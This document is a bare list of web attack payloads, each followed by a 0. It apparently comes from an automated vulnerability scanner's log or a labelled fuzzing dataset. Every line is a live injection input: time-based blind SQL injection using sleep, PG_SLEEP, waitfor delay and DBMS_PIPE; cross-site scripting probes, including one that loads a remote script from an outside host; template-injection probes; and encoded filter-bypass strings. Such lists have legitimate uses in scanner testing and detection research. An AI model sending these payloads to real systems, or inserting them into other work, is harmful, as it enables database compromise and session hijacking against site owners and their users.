if(now()=sysdate(),sleep(15),0) 0
aiPxvpay fx9LhCQr') OR 859=(SELECT 859 FROM PG_SLEEP(15))-- 0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 0
aiPxvpay UY5YjFKs')) OR 697=(SELECT 697 FROM PG_SLEEP(15))-- 0
aiPxvpay 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 0
-1; waitfor delay '0:0:15' -- 0
aiPxvpay 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 0
aiPxvpay 1'" 0
aiPxvpay 1????%2527%2522 0
aiPxvpay @@pdm1U 0
-1); waitfor delay '0:0:15' -- 0
1 waitfor delay '0:0:15' -- 0
oUsoTliP'; waitfor delay '0:0:15' -- 0
-5 OR 861=(SELECT 861 FROM PG_SLEEP(15))-- 0
-5) OR 955=(SELECT 955 FROM PG_SLEEP(15))-- 0
-1)) OR 762=(SELECT 762 FROM PG_SLEEP(15))-- 0
VnTJtTIs' OR 496=(SELECT 496 FROM PG_SLEEP(15))-- 0
aXAHN8Ga') OR 928=(SELECT 928 FROM PG_SLEEP(15))-- 0
PLYmI9Rq')) OR 507=(SELECT 507 FROM PG_SLEEP(15))-- 0
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 0
1'"()&%<zzz><ScRiPt >TRYs(9356)</ScRiPt> 0
1'"()&%<zzz><ScRiPt >XWMf(9765)</ScRiPt> 0
'"()&%<zzz><ScRiPt >TRYs(9420)</ScRiPt> 0
'"()&%<zzz><ScRiPt >XWMf(9240)</ScRiPt> 0
19100450 0
19788574 0
bfg3571%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3571 0
bfgx8857%C0%BEz1%C0%BCz2a%90bcxhjl8857 0
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 0
1'" 0
1????%2527%2522 0
@@Dk8U4 0
<%={{={@{#{${dfb}}%> 0
bfgx2341%C0%BEz1%C0%BCz2a%90bcxhjl2341 0
<th:t="${dfb}#foreach 0
<%={{={@{#{${dfb}}%> 0
<th:t="${dfb}#foreach 0
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 0
dfb{{98991*97996}}xca 0
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 0
dfb[[${98991*97996}]]xca 0
dfb{{98991*97996}}xca 0
dfb[[${98991*97996}]]xca 0
dfb__${98991*97996}__::.x 0
dfb__${98991*97996}__::.x 0
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 0
1<ScRiPt >XWMf(9218)</ScRiPt> 0
1<WP6CDV>QMJTF[!+!]</WP6CDV> 0
1<script>XWMf(9251)</script> 0
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%58%57%4D%66%28%39%38%30%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 0
1<ScRiPt >XWMf(9692)</ScRiPt> 0
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9206></ScRiPt> 0
1<ScRiPt >XWMf(9257)</ScRiPt> 0
1<svg ?onload=XWMf(9784);> 0
1<isindex type=image src=1 onerror=XWMf(9675)> 0
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 0
1<ScRiPt >TRYs(9412)</ScRiPt> 0
1'"()&%<zzz><ScRiPt >imw7(9779)</ScRiPt> 0
1'"()&%<zzz><ScRiPt >5r7h(9778)</ScRiPt> 0
'"()&%<zzz><ScRiPt >imw7(9796)</ScRiPt> 0
'"()&%<zzz><ScRiPt >5r7h(9557)</ScRiPt> 0
19321481 0
19669085 0
bfg10626%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl10626 0
bfgx2605%C0%BEz1%C0%BCz2a%90bcxhjl2605 0
\<\%\=\{\{\=\{\@\{\#\{\$\{dfb\}\}\%\> 0
<%={{={@{#{${dfb}}%> 0
<th:t="${dfb}#foreach 0
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 0
dfb{{98991*97996}}xca 0
dfb[[${98991*97996}]]xca 0
dfb__${98991*97996}__::.x 0
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 0
1<ScRiPt >5r7h(9674)</ScRiPt> 0
1<WIFCSU>JDFBT[!+!]</WIFCSU> 0
1<script>5r7h(9122)</script> 0
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%35%72%37%68%28%39%31%32%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 0
1<ScRiPt >5r7h(9392)</ScRiPt> 0